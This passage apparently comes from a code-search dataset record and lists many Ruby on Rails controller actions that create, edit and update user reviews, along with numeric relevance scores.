"def create\n if params[:user_id] && params[:recruiter_id] && params[:review]\n user = User.find(params[:user_id])\n # puts user\n recruiter = Recruiter.find(params[:recruiter_id])\n # puts recruiter\n ################################\n params[\"got_interview\"] ? got_interview = params[\"got_interview\"] : got_interview = false\n params[\"got_job\"] ? got_job = params[\"got_job\"] : got_job = false\n got_job ? got_interview = true : \"null\" #if got job then must have had interview\n params[\"rating\"] ? rating = params[\"rating\"] : rating = 0 #0 means not rated\n params[\"recommended\"] ? recommended = params[\"recommended\"] : recommended = false\n params[\"ghoster\"] ? ghoster = params[\"ghoster\"] : ghoster = false\n # puts \"*********$\"\n # puts params\n # puts recommended\n # puts params[:recommended]\n # puts \"***************$\"\n review = Review.new(\n user_id: user.id,\n recruiter_id: recruiter.id,\n review: params[\"review\"],\n got_interview: got_interview,\n got_job: got_job,\n rating: rating,\n recommended: recommended,\n ghoster: ghoster\n ) #Review.new\n\n if review.save\n render json: {\"POSTED REVIEW\": \"ok\"} #works\n else\n render json: {\"error\": \"ERROR SAVE POSTED REVIEW\"}\n end\n ################################\n # render json: {\"POSTED REVIEW\": \"ok\"} #works\n else\n render json: {\"error\": \"no user_id or recruiter_id or review\"}\n end # if params[:user_id]\n end",
"def create\n @recipe = Recipe.find params[:recipe_id]\n review = Review.new review_params\n review.recipe = @recipe\n review.user = current_user\n if review.save\n render json:{id: review.id}\n else \n render(json: {status: 422},\n status: 422 )\n end\n end",
"def create\n @review = Review.new(review_params)\n\n respond_to do |format|\n if @review.save\n # TODO redirect to page that shows what their review will look like. \n format.html { redirect_to thanks_path, notice: 'Review was successfully created.' }\n format.json { render :show, status: :created, location: @review }\n else\n format.html { render :new }\n format.json { render json: @review.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n final_set = []\n params['doctors_review'].permit!\n doctors_id = params['doctors_review']['doctors_id']\n specialties_id = DoctorsSpecialty.where(doctors_id: doctors_id).first\n .specialties_id\n specialty = Specialty.find(specialties_id)\n unless specialties_id.nil?\n params['doctors_review']['specialties_id'] = specialties_id\n end\n @doctors_reviews = DoctorsReview.new(params['doctors_review'])\n if @doctors_reviews.save\n rating = params['doctors_review']['rating']\n unless rating.nil?\n all_reviews = DoctorsReview.where(specialties_id: specialties_id)\n .where('rating >= ?', rating).order('rating')\n all_reviews&.each do |review|\n doctor = Doctor.find(review['doctors_id'])\n recommendations = { specialty: specialty.name,\n doctor: doctor.name,\n rating: review.rating,\n comments: review.comments\n }\n final_set << recommendations\n end\n end\n final_set\n else\n @doctors_reviews.errors.full_messages\n end\n end",
"def create\n @user = User.find(params[:id])\n @user.reviews.push(current_user)\n redirect_to reviews_path\n end",
"def create\n @item_review = ItemReview.new(item_review_params)\n\n respond_to do |format|\n if @item_review.save\n format.html { redirect_to @item_review, notice: 'Item review was successfully created.' }\n format.json { render :show, status: :created, location: @item_review }\n else\n format.html { render :new }\n format.json { render json: @item_review.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n # 今日振り返りしたかの確認\n review = Review.where(user_id: current_user.id, created_at: Time.current.at_beginning_of_day..Time.current.at_end_of_day)\n\n if review.exists?\n review.update(review_params)\n redirect_to user_path(current_user.id)\n flash[:notice] = \"振り返りの更新に成功しました。\"\n #TODO エラーメッセージ\n # respond_to do |format|\n # format.html { redirect_to review, notice: \"振り返りの更新に成功しました。\" }\n # format.json { render :show, status: :ok, location: review }\n # end\n else\n\n @review = Review.new(review_params)\n @review.user_id = current_user.id\n respond_to do |format|\n if @review.save\n # 目標達成で5pt, タスク達成で2pt, 振り返り投稿で1pt、自分のレベルの10倍のポイントがたまるとレベルアップ\n if Goal.goal_point(current_user) + Task.task_point(current_user) + Review.review_point(current_user) > LEVEL_UP_POINT*current_user.level\n # レベル+1\n current_user.upgrade_level\n flash[:notice] = \"レベル「+1」アップ 、現在のレベルは#{current_user.level}です。\"\n end\n format.html { redirect_to @review, notice: \"振り返りの作成に成功しました。\" }\n format.json { render :show, status: :created, location: @review }\n else\n format.html { render :new, status: :unprocessable_entity }\n format.json { render json: @review.errors, status: :unprocessable_entity }\n end\n end\n end\n end",
"def create\n @book_review = BookReview.new(params[:book_review])\n\n respond_to do |format|\n if @book_review.save\n format.html { redirect_to @book_review, notice: 'Book review was successfully created.' }\n format.json { render json: @book_review, status: :created, location: @book_review }\n else\n format.html { render action: \"new\" }\n format.json { render json: @book_review.errors, status: :unprocessable_entity }\n end\n end\n end",
"def review\n @users = User.all\n @review = Review.new\n end",
"def create\n @review = Review.new(review_params)\n\n if Course.exists?(params[:review][:course_id]) and Professor.exists?(params[:review][:professor_id])\n course = Course.find(params[:review][:course_id])\n professor = Professor.find(params[:review][:professor_id])\n if !professor.courses.exists?(course.id)\n professor.courses << course\n professor.save\n end\n reviews = Review.where(course_id: params[:review][:course_id], professor_id: params[:review][:professor_id])\n average = (reviews.sum(:rating) + @review.rating)/(reviews.count.to_f + 1)\n course_professor_association = CourseProfessorAssociation.find_by(course_id: params[:review][:course_id], professor_id: params[:review][:professor_id])\n course_professor_association.average_rating = average\n course_professor_association.save\n end\n respond_to do |format|\n if @review.save\n format.html { redirect_to show_reviews_path(professor_id: params[:review][:professor_id], course_id: params[:review][:course_id]),\n notice: 'Review was successfully created.' }\n format.json { render :show, status: :created, location: @review }\n else\n @professors = Professor.all\n @courses = Course.all\n @course_id = params[:review][:course_id]\n @professor_id = params[:review][:professor_id]\n format.html { render :new }\n format.json { render json: @review.errors, status: :unprocessable_entity }\n end\n end\n end",
"def new\n @review = Review.new\n end",
"def new\n @review = Review.new\n end",
"def new\n @review = Review.new\n end",
"def new\n @review = Review.new\n end",
"def new\n @review = Review.new\n end",
"def new\n @review = Review.new\n end",
"def new\n @review = Review.new\n end",
"def new\n @review = Review.new\n end",
"def create\n @review = Review.new(review_params)\n if(@review.save)\n redirect_to game_path(@review.game)\n else\n @games = Game.all-current_user.games\n render :new\n end\n end",
"def create\n @review = Review.new(review_params)\n @review.user_id = @user.id\n\n if @review.save\n flash[:success] = 'Review was successfully created.'\n redirect_to user_path(@user)\n else\n flash[:danger] = \"Try again\"\n render :new\n end\n end",
"def create\n @review = Review.new(review_params)\n @review.user_id = current_user.id\n @review.post_date = Time.now\n\n if @review.save\n # Create notifications for the user's friends\n current_user.friends.each do |friend|\n Notification.create(recipient: friend, actor: current_user, action: 'posted', notifiable: @review)\n end\n\n # Create and attach the tags\n create_tags collect_tags(params[:review]), @review.id\n redirect_to '/profile'\n else\n redirect_to '/home'\n end\n end",
"def create\n @user_review = UserReview.new(user_review_params)\n\n respond_to do |format|\n if @user_review.save!\n format.html { redirect_to user_reviews_path, notice: 'User review was successfully created.' }\n format.json { render :show, status: :created, location: @user_review }\n else\n format.html { render :new }\n format.json { render json: @user_review.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @critic_review = CriticReview.new(critic_review_params)\n\n respond_to do |format|\n if @critic_review.save\n format.html { redirect_to @critic_review, notice: 'Critic review was successfully created.' }\n format.json { render :show, status: :created, location: @critic_review }\n else\n format.html { render :new }\n format.json { render json: @critic_review.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @item_review = ItemReview.new(item_review_params)\n\n respond_to do |format|\n if @item_review.save\n format.html { redirect_to @item_review, notice: 'Item review was successfully created.' }\n format.json { render action: 'show', status: :created, location: @item_review }\n else\n format.html { render action: 'new' }\n format.json { render json: @item_review.errors, status: :unprocessable_entity }\n end\n end\n end",
"def add_review(restaurant, content)\n Review.new(restaurant, self, content)\n end",
"def create\n @review = Review.new(review_params)\n @review.assign_attributes user: current_user, book_id: params[:book_id]\n if @review.save\n redirect_to book_path(@review.book)\n else\n render :new\n end\n end",
"def create\n @comic = Comic.find(params[:comic_id])\n @review = current_user.reviews.new(review_params)\n @review.tag_list = params[:tag_list]\n @review.comic_id = @comic.id\n p @review\n p review_params\n respond_to do |format|\n if @review.save\n format.html { redirect_to comic_path(@comic), notice: 'Review was successfully created.' }\n format.json { render :show, status: :created, location: @review }\n else\n format.html { render :new }\n format.json { render json: @review.errors, status: :unprocessable_entity }\n end\n end\n end"
] |
[
"0.7899681",
"0.78670037",
"0.77011317",
"0.766486",
"0.7655177",
"0.7631226",
"0.762612",
"0.76167107",
"0.75981355",
"0.758156",
"0.75776124",
"0.7572586",
"0.7566595",
"0.75486314",
"0.75380796",
"0.7514578",
"0.74950445",
"0.7490343",
"0.7468508",
"0.7468508",
"0.7467554",
"0.74673194",
"0.7420729",
"0.7414288",
"0.7396201",
"0.73846793",
"0.73767644",
"0.7374546",
"0.73714954",
"0.73714954",
"0.73714954",
"0.7364483",
"0.7358371",
"0.73567396",
"0.73541635",
"0.7330742",
"0.73259896",
"0.7319033",
"0.7302522",
"0.7294481",
"0.7276302",
"0.72752744",
"0.72738814",
"0.7272741",
"0.7266918",
"0.72619504",
"0.72601694",
"0.72513396",
"0.72483516",
"0.7247397",
"0.7247265",
"0.72461975",
"0.7244283",
"0.722575",
"0.722558",
"0.72242653",
"0.71955985",
"0.71940607",
"0.71907175",
"0.71856636",
"0.7183391",
"0.7180842",
"0.7154671",
"0.7149676",
"0.713895",
"0.71340704",
"0.7133696",
"0.7132234",
"0.71321493",
"0.7128558",
"0.7100638",
"0.7100087",
"0.70971227",
"0.70859027",
"0.70768386",
"0.705129",
"0.70344996",
"0.7025427",
"0.70168227",
"0.7016468",
"0.70149845",
"0.7000467",
"0.699917",
"0.69984764",
"0.69984764",
"0.69984764",
"0.69984764",
"0.69984764",
"0.69984764",
"0.69984764",
"0.69984764",
"0.6995317",
"0.6989556",
"0.6976831",
"0.696247",
"0.69618803",
"0.6958082",
"0.69554645",
"0.6952455",
"0.6939582"
] |
0.7508563
|
16
|
edit is the method that takes care of editing a review: it loads the share's reviews in priority order and looks up the review selected for modification
|
def edit
@reviews = @share.reviews.order(priority: :asc)
@reviewToAlter = Review.find(params[:id])
end
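Note that the action assumes @share has already been loaded by the surrounding controller, typically via a callback. A minimal sketch of that plumbing, under the assumption of a nested share_id route parameter (set_share is hypothetical and not part of the snippet):

before_action :set_share

private

# Assumed callback: loads the parent share referenced as @share
# in the edit/update/destroy actions.
def set_share
  @share = Share.find(params[:share_id])
end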
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def edit_review\n # client should be able to edit a review.\n puts \"Which review would you like to edit?\"\n pp Client.find_by(name: @@client_name).reviews\n puts \"Please enter the ID\"\n input = gets.strip\n selected_review = Review.find_by(id: input)\n puts \"What would you like for the new review to say?\"\n input = gets.strip\n selected_review.update(text_body: input)\n puts \"Your review has been updated, here's the new review:\"\n pp selected_review\n client_continue\n end",
"def edit\n \n end",
"def edit\n @title = t 'conclusion_draft_review.edit_title'\n\n @conclusion_draft_review.review.build_best_practice_comments\n end",
"def edit\n \n end",
"def edit\n \n end",
"def edit\n \n end",
"def edit\n \n end",
"def edit\n \n end",
"def edit\n \n end",
"def edit\n \n end",
"def edit; end",
"def edit; end",
"def edit; end",
"def edit; end",
"def edit; end",
"def edit; end",
"def edit; end",
"def edit; end",
"def edit; end",
"def edit; end",
"def edit; end",
"def edit; end",
"def edit; end",
"def edit; end",
"def edit; end",
"def edit; end",
"def edit; end",
"def edit; end",
"def edit; end",
"def edit; end",
"def edit; end",
"def update\n\t\t@reviews = @share.reviews.order(priority: :asc)\n\t\t@reviewToAlter = Review.find(params[:id])\n\t\t@review = Review.find(params[:id])\n\t\tif @review.update(review_params)\n\t\t\tredirect_to share_reviews_path(@share), notice: 'Review successfully updated!'\n\t\telse\n\t\t\tflash[:alert] = \"Error : #{@review.errors.full_messages.to_sentence}\"\n\t\t\trender :edit\n\t\tend\n\tend",
"def edit\r\n \r\n end",
"def edit\n\n end",
"def edit\r\n end",
"def editReview\n # TODO: Do a server-side validation of all params in addition to client side (html) validation\n # Also sanitize input -- escape any javascript and html\n # TODO: Add validations/constrictions to DB\n @building = params[:building]\n @room = params[:room]\n @facilityType = params[:facility]\n @review = params[:review]\n @rating = params[:rating]\n\n @newReview = Review.find_by_id(params[:id])\n\n @newReview.review = @review\n @newReview.rating = @rating\n @newReview.save\n\n roomId = Room.where(roomNum: @room).first.id\n # Get the number of reviews for this room so we can calculate the new average\n reviews = Review.where(room_id: roomId).to_a\n nReviews = reviews.length\n reviewSum = reviews.reduce(0) { |sum, review| sum + review.rating}\n\n # Update rating average for room\n currentRoom = Room.find(roomId)\n currentRoom.save\n\n # Redirect user to results page\n redirect_to controller: 'room_page', action: 'roomInfo', id: roomId\n end",
"def update\n if @review.update_attributes(review_params)\n redirect_to edit_review_path(@review), notice: (\"Review was successfully updated.\")\n else\n render action: \"edit\"\n end\n end",
"def edit \n end",
"def edit \n end",
"def review\n end",
"def update\n if @review.update(review_params)\n redirect_to @review.story, notice: 'Review was successfully updated.'\n else\n render :edit\n end\n end",
"def edit\n end",
"def edit\n end",
"def edit\n end",
"def edit\n end",
"def edit\n end",
"def edit\n end",
"def edit\n end",
"def edit\n end",
"def edit\n end",
"def edit\n end",
"def edit\n end",
"def edit\n end",
"def edit\n end",
"def edit\n\n end",
"def edit\n\n end",
"def edit\n\n end",
"def edit\n\n end",
"def edit\n\n end",
"def edit\n\n end",
"def edit\n\n end",
"def edit\n\n end",
"def edit\n\n end",
"def edit\n\n end",
"def edit\n\n end",
"def edit\n\n end",
"def edit\n\n end",
"def edit\n\n end",
"def edit\n\n end",
"def edit\n movie = Movie.find(params[:movie_id])\n @review = Review.find(params[:id])\n @movie = Movie.find(params[:movie_id])\n end",
"def edit\n end",
"def edit\n end",
"def edit\n end",
"def edit\n end",
"def edit\n end",
"def edit\n end",
"def edit\n end",
"def edit\n end",
"def edit\n end",
"def edit\n end",
"def edit\n end",
"def edit\n end",
"def edit\n end",
"def edit\n end",
"def edit\n end",
"def edit\n end",
"def edit\n end",
"def edit\n end",
"def edit\n end",
"def edit\n end",
"def edit\n end",
"def edit\n end",
"def edit\n end",
"def edit\n end",
"def edit\n end",
"def edit\n end",
"def edit\n end",
"def edit\n end",
"def edit\n end",
"def edit\n end"
] |
[
"0.77618456",
"0.768884",
"0.76548994",
"0.7574851",
"0.7574851",
"0.7574851",
"0.7574851",
"0.7574851",
"0.7574851",
"0.7574851",
"0.756434",
"0.756434",
"0.756434",
"0.756434",
"0.756434",
"0.756434",
"0.756434",
"0.756434",
"0.756434",
"0.756434",
"0.756434",
"0.756434",
"0.756434",
"0.756434",
"0.756434",
"0.756434",
"0.756434",
"0.756434",
"0.756434",
"0.756434",
"0.756434",
"0.74978226",
"0.7478179",
"0.7455232",
"0.7444681",
"0.74160975",
"0.73966503",
"0.7389753",
"0.7389753",
"0.7383019",
"0.7364716",
"0.73611975",
"0.73611975",
"0.73611975",
"0.73611975",
"0.73611975",
"0.73611975",
"0.73611975",
"0.73611975",
"0.73611975",
"0.73611975",
"0.73611975",
"0.73611975",
"0.73611975",
"0.72983605",
"0.7268397",
"0.7268397",
"0.7268397",
"0.7268397",
"0.7268397",
"0.7268397",
"0.7268397",
"0.7268397",
"0.7268397",
"0.7268397",
"0.7268397",
"0.7268397",
"0.7268397",
"0.7268397",
"0.7249033",
"0.7247505",
"0.7247505",
"0.7247505",
"0.7247505",
"0.7247505",
"0.7247505",
"0.7247505",
"0.7247505",
"0.7247505",
"0.7247505",
"0.7247505",
"0.7247505",
"0.7247505",
"0.7247505",
"0.7247505",
"0.7247505",
"0.7247505",
"0.7247505",
"0.7247505",
"0.7247505",
"0.7247505",
"0.7247505",
"0.7247505",
"0.7247505",
"0.7247505",
"0.7247505",
"0.7247505",
"0.7247505",
"0.7247505",
"0.7247505"
] |
0.81355745
|
0
|
The update routine saves a modified review. If the review is successfully modified, the user is notified via a flash notice; on failure, the validation errors are flashed and the edit form is re-rendered
|
def update
@reviews = @share.reviews.order(priority: :asc)
@reviewToAlter = Review.find(params[:id])
@review = Review.find(params[:id])
if @review.update(review_params)
redirect_to share_reviews_path(@share), notice: 'Review successfully updated!'
else
flash[:alert] = "Error : #{@review.errors.full_messages.to_sentence}"
render :edit
end
end
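Both branches depend on a review_params helper that the snippet calls but does not define. A minimal sketch of the strong-parameters whitelist it implies; the permitted attribute names (body, rating, priority) are assumptions rather than confirmed fields, though the priority ordering above suggests such a column exists:

private

# Hypothetical whitelist; only the helper's existence is shown above,
# not which attributes it actually permits.
def review_params
  params.require(:review).permit(:body, :rating, :priority)
end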
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def update\n\t\t\t\trender_invalid_action(current_review) unless current_review.update(update_driver_review_params)\n\t\t\tend",
"def update\n @review = Review.find(params[:id])\n\n if @review.update_attributes(params[:review])\n\t\t\tredirect_to reviews_path, :notice => \"De waardering is aangepast.\"\n else\n\t\t\tredirect_to reviews_path, :notice => \"De aanpassing kan op dit moment niet worden doorgevoerd. Het is mogelijk dat je meer dan drie referenties wilt aanvinken voor op de voorpagina.\"\n end\n end",
"def update\n respond_to do |format|\n if @review.update_attributes(review_params)\n flash[:success] = \"Review updated\"\n format.html { redirect_to @review.user } # notice: 'Review was successfully updated.'\n format.json { head :no_content }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @review.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @review = Review.find(params[:id])\n @review.attributes = review_params(params)\n\n update_story_attributes(@review, params[:story])\n update_member_settings(@review, params[:review_form_expanded])\n update_source_review(@review.story, params[:source_ratings])\n \n if @review.save_and_process_with_propagation\n if current_member.status == 'guest'\n flash[:notice] = render_to_string(:inline => \"<h2>Your review was successfully updated,<br>but will not be published until you activate your account.</h2>Check your email inbox and click on your activation link. For help, check our <%= help_link('FAQ', 'activate') %>.\")\n render :json => { :go => :story_actions, \n :form_transition => {:from => :review, :to => :story_actions} }.to_json\n else\n notice = tweet_if_requested(@review, params[:short_url])\n render :json => { :go => :story_actions, \n :form_transition => {:from => :review, :to => :story_actions}, \n :notice => notice,\n :fb_stream_story => toolbar_facebook_stream_story(@review) }.to_json\n end\n\n if @review.hidden? && !current_member.has_role_or_above?(:admin)\n NotificationMailer.deliver_edit_alert(:subject => \"Hidden Review Updated\", :body => \"Check #{review_url(@review)}.\")\n end\n else\n render :json => {:error_message => \"Failed to save review\"}.to_json\n end\n end",
"def update\n if @review.update(review_params)\n flash[:success] = 'Review was successfully updated.'\n redirect_to user_path(@user)\n else\n flash[:danger] = \"Try again\"\n render :new\n end\n end",
"def update\n respond_to do |format|\n #If the params are filled in and valid, it redirects to the review page and shows the notice\n if @review.update(review_params)\n format.html { redirect_to @review, notice: t('review.update') }\n format.json { render :show, status: :ok, location: @review }\n #If it doesnt update then it refreshes the edit review page\n else\n format.html { render :edit }\n format.json { render json: @review.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n if @review.update_attributes(review_params)\n redirect_to edit_review_path(@review), notice: (\"Review was successfully updated.\")\n else\n render action: \"edit\"\n end\n end",
"def update\n respond_to do |format|\n if @review.update(review_params)\n format.html { redirect_to @user, notice: '评价更新成功' }\n format.json { head :no_content }\n else\n format.html { render :edit }\n format.json { render json: @review.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @review = reviewable.reviews.find(params[:id])\n\n respond_to do |format|\n if @review.update_attributes(params[:review])\n format.html { redirect_to reviewable_review_url(reviewable, @review), notice: 'Review was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @review.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @review = Review.find(params[:id])\n\t handle_faculty\n\t\n respond_to do |format|\n if @review.update_attributes(params[:review])\n flash[:notice] = 'Review was successfully updated.'\n format.html { redirect_to(@review) }\n format.xml { head :ok }\n else\n format.html { render :action => \"edit\" }\n format.xml { render :xml => @review.errors, :status => :unprocessable_entity }\n end\n end\n end",
"def update\n @review = Review.find(params[:id])\n\n respond_to do |format|\n if @review.update_attributes(params[:review])\n flash[:notice] = 'Review was successfully updated.'\n format.html { redirect_to(@review) }\n format.xml { head :ok }\n else\n format.html { render :action => \"edit\" }\n format.xml { render :xml => @review.errors, :status => :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @review.update(review_params)\n format.html { redirect_to @review, notice: 'Review was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: 'edit' }\n format.json { render json: @review.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @review.update(review_params)\n format.html { redirect_to @review, notice: 'Review was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: 'edit' }\n format.json { render json: @review.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @review.update(review_params)\n format.html { redirect_to @review, notice: 'Review was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: 'edit' }\n format.json { render json: @review.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @review.update(review_params)\n format.html { redirect_to @review, notice: 'Review was successfully updated.' }\n format.json { render :show, status: :ok, location: @review }\n else\n format.html { render :edit }\n format.json { render json: @review.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @review.update(review_params)\n format.html { redirect_to @review, notice: 'Review was successfully updated.' }\n format.json { render :show, status: :ok, location: @review }\n else\n format.html { render :edit }\n format.json { render json: @review.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @review.update(review_params)\n format.html { redirect_to @review, notice: 'Review was successfully updated.' }\n format.json { render :show, status: :ok, location: @review }\n else\n format.html { render :edit }\n format.json { render json: @review.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @review.update(review_params)\n format.html { redirect_to @review, notice: 'Review was successfully updated.' }\n format.json { render :show, status: :ok, location: @review }\n else\n format.html { render :edit }\n format.json { render json: @review.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @review.update(review_params)\n format.html { redirect_to @review, notice: 'Review was successfully updated.' }\n format.json { render :show, status: :ok, location: @review }\n else\n format.html { render :edit }\n format.json { render json: @review.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @review.update(review_params)\n format.html { redirect_to @review, notice: 'Review was successfully updated.' }\n format.json { render :show, status: :ok, location: @review }\n else\n format.html { render :edit }\n format.json { render json: @review.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @review.update(review_params)\n format.html { redirect_to @review, notice: 'Review was successfully updated.' }\n format.json { render :show, status: :ok, location: @review }\n else\n format.html { render :edit }\n format.json { render json: @review.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n if @review.update(review_params)\n render :show, status: :ok, location: @review\n else\n render json: @review.errors, status: :unprocessable_entity\n end\n end",
"def update\n respond_to do |format|\n if @review.update(review_params)\n format.html { redirect_to @review.publication, notice: 'Review was successfully updated.' }\n format.json { render :show, status: :ok, location: @review }\n else\n format.html { render :edit }\n format.json { render json: @review.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @review.update(review_params)\n format.html { redirect_to @review, notice: \"振り返りの更新に成功しました。\" }\n format.json { render :show, status: :ok, location: @review }\n else\n format.html { render :edit, status: :unprocessable_entity }\n format.json { render json: @review.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @review.update(review_params)\n format.html { redirect_to @review, notice: \"レビューを更新しました\" }\n format.json { render :show, status: :ok, location: @review }\n else\n format.html { render :edit, status: :unprocessable_entity }\n format.json { render json: @review.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n if current_user.blank?\n redirect_to professor_course_path(\n @review.professor_id,\n @review.course_id\n ),\n notice: 'You must be\n logged in to update a review.'\n else\n @review.authuser_id = current_user.id\n respond_to do |format|\n if @review.update(review_params)\n format.html do\n redirect_to professor_course_path(\n @review.professor_id,\n @review.course_id\n ),\n notice: 'Review was successfully updated.'\n end\n format.json { render :show, status: :ok, location: @review }\n else\n format.html do\n @courses = load_courses\n @professors = load_professors\n render :edit\n end\n format.json do\n render json: @review.errors, status: :unprocessable_entity\n end\n end\n end\n end\n end",
"def update\n respond_to do |format|\n if @critic_review.update(critic_review_params)\n format.html { redirect_to @critic_review, notice: 'Critic review was successfully updated.' }\n format.json { render :show, status: :ok, location: @critic_review }\n else\n format.html { render :edit }\n format.json { render json: @critic_review.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @review.update(review_params)\n @paper = @review.paper\n @rate = 0.0\n @top = 0.0\n @bottem = 0.0\n @paper.reviews.each do |review| \n @top += review.score * review.confidence\n @bottem += review.confidence\n end\n @rate = @top / @bottem\n @paper.update_attribute(:rating, @paper.rating = @rate)\n format.html { redirect_to @review, notice: 'Review was successfully updated.' }\n format.json { render :show, status: :ok, location: @review }\n else\n format.html { render :edit }\n format.json { render json: @review.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @review = Review.find(params[:id])\n\n respond_to do |format|\n if @review.update_attributes(params[:review])\n format.html { redirect_to @review, notice: 'Review was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @review.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @review = Review.find(params[:id])\n\n respond_to do |format|\n if @review.update_attributes(params[:review])\n format.html { redirect_to @review, notice: 'Review was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @review.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @review = Review.find(params[:id])\n\n respond_to do |format|\n if @review.update_attributes(params[:review])\n format.html { redirect_to @review, notice: 'Review was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @review.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @review = Review.find(params[:id])\n\n respond_to do |format|\n if @review.update_attributes(params[:review])\n format.html { redirect_to @review, notice: 'Review was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @review.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @review.update(review_params)\n format.html { redirect_to project_path(@project), notice: 'Review was successfully updated.' }\n format.json { render :show, status: :ok, location: @review }\n else\n format.html { render :edit }\n format.json { render json: @review.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @review.update(review_params)\n format.html { redirect_to restaurent_path(@restaurent.id), notice: 'Review was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: 'edit' }\n format.json { render json: @review.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @review = Review.find(params[:id])\n unless current_user.is_review_moderator? or current_user = @review.user\n redirect_to denied_path\n return\n end\n\n respond_to do |format|\n if @review.update_attributes(params[:review])\n format.html { redirect_to(@review, :notice => 'Review was successfully updated.') }\n format.xml { head :ok }\n else\n format.html { render :action => \"edit\" }\n format.xml { render :xml => @review.errors, :status => :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @admin_review.update(admin_review_params)\n format.html { redirect_to admin_review_path(@admin_review), notice: 'Review was successfully updated.' }\n format.json { render :show, status: :ok, location: admin_review_path(@admin_review) }\n else\n format.html { render :edit }\n format.json { render json: @admin_review.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @review.update(review_params)\n format.html { redirect_to @listing, notice: 'Review was updated.' }\n format.json { render :show, status: :ok, location: @review }\n else\n format.html { render :edit }\n format.json { render json: @review.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @user_review.update!(user_review_params)\n format.html { redirect_to user_reviews_path, notice: 'User review was successfully updated.' }\n format.json { render :show, status: :ok, location: @user_review }\n else\n format.html { render :edit }\n format.json { render json: @user_review.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n\t\t@review = Review.find(params[:id])\n\t\t@review.establishment = Establishment.find(params[:establishment])\n\t\t@review.category = Category.find(params[:category])\n\t\t@review.clientele = Clientele.find(params[:clientele])\n\t\t@review.sound_level = SoundLevel.find(params[:sound_level])\n\t\t@review.hygiene = Hygiene.find(params[:hygiene])\n\t\t@review.rating = Rating.find(params[:rating])\n\n\t\trespond_to do |format|\n\t\t\tif @review.update_attributes(params[:review])\n\t\t\t\tformat.html { redirect_to(@review, :notice => 'Review was successfully updated.') }\n\t\t\t\tformat.xml { head :ok }\n\t\t\telse\n\t\t\t\tformat.html { render :action => \"edit\" }\n\t\t\t\tformat.xml { render :xml => @review.errors, :status => :unprocessable_entity }\n\t\t\tend\n\t\tend\n\tend",
"def update\n @review = Review.find(params[:id])\n # respond_to do |format|\n \n if @review.update(review_params)\n flash[:success] = '店舗情報を修正しました。'\n redirect_to reviews_path(@review)\n else\n render 'edit'\n end\n end",
"def update\n @user_review = UserReview.find(params[:id])\n\n respond_to do |format|\n if @user_review.update_attributes(params[:user_review])\n flash[:notice] = 'UserReview was successfully updated.'\n format.html { redirect_to(@user_review) }\n format.xml { head :ok }\n else\n format.html { render :action => \"edit\" }\n format.xml { render :xml => @user_review.errors, :status => :unprocessable_entity }\n end\n end\n end",
"def update\n @review = @album.review\n\n respond_to do |format|\n if @review.update_attributes(params[:review])\n flash[:notice] = \"Review '#{@review}' was successfully updated.\"\n format.html { redirect_to review_url(@review) }\n format.xml { head :ok }\n format.js { render :template => 'music/reviews/success' }\n else\n format.html { render :action => :edit }\n format.xml { render :xml => @review.errors.to_xml }\n format.js { render :template => 'music/reviews/error' }\n end\n end\n end",
